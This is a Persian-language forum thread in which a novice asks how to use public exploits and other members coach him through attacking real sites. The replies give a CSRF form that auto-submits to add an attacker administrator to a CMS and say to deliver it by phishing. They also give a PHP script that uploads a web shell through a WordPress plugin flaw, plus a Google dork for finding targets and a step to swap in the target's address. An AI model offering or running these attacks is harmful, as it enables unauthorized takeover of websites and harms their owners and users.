رفتن به مطلب
انجمن تیم امنیتی گارد ایران

در خواست آموزش کار با اکسپلویت ها


ارسال های توصیه شده

سلام من نمی تونم با اکسپلویت ها کار کنم میشه کمکم کنید

 

الان این باگ جدید از csrf اومده ولی نمی تونم باهاش کار کنم

https://www.exploit-db.com/exploits/39988/
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود دوست عزیز ببینید چیزی که داخل اکسپلویت توضیح داده شده این اکسپلویت  در cms یونا به این معنی هست که شما یک فرم رو باید برای ادمین از طریق فیشینگ یا هر روشی ارسال کنید 

 

همین که اون ادمین از فرم شما استفاده کنه میتونید اقدام کنید   برای اضافه کردن ادمین یا  کلا استفاده از  پنل مدیریتی .

 

 

این هم کد فرمتون باید تو هاستتون اپلود کنید و تو قسمتت لوکال هاست هم ادرس سایت جایگزین کنید .

 
<form method="post" action="http://localhost/admin/admin-user/add">   
<input type="hidden" name="login" value="attacker"/>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="name" value="attacker"/>
<input type="hidden" name="role" value="admin"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ممنونم خوب حالا اگه یک اکسپلویت دیگه باشه چیکار باید و شما چطوری تونستید بفهمید اینطوری باید از استفاده کنید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

حالا این اکسپلویت های php روش کار شون چطوری یعنی به شکل نرم افزار اجرا می شوند

 

الان این اکسپلویت هیچ توضیحی نداده یعنی الان چیکار کنم

 

https://www.exploit-db.com/exploits/37166/

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ببین عزیز اکثر اکسپلویت ها روش خاصی ندارند .. مثلا شما  یه نگاه به همین مینداختی میفهمیدی این اکسپلویت واسه اپلود و شل و .... خب شما میای اول دورکی که داخل

 

اکسپلویت هست رو سرچ میکنید

 

اکسپلویت

Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
<?php 
$evil="dz.phtml"; 
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); curl_close($ch); 
echo "$postResult"; 
?>
Shell Access :
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil
 
# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !

 دورک

inurl:/wp-content/plugins/dzs-zoomsounds/

 

 

دورک رو سرچ میکنید بعدش تکه کد زیر رو باید داخل هاستتون اپلود کنید و به جای 127.0.0.1 ادرس تارگت مورد نظرتون رو مینویسید

<?php 
$evil="dz.phtml"; 
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); curl_close($ch); 
echo "$postResult"; 
?>

اگه باگ پچ نشده باشه میتونید از مسیر زیر به شلتون دسترسی داشته باشید

http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil

این اکسپلویت مال یه سال پیشه و اکثرا سایتای باگ دار پچ شده .

 

 

یا علی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خوب تو زودی فهمیدی که باید در هاست آپلودش بکنی و من هرچی فکر کردم نفهمیدم و الانم توی همین ماجراها موندم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...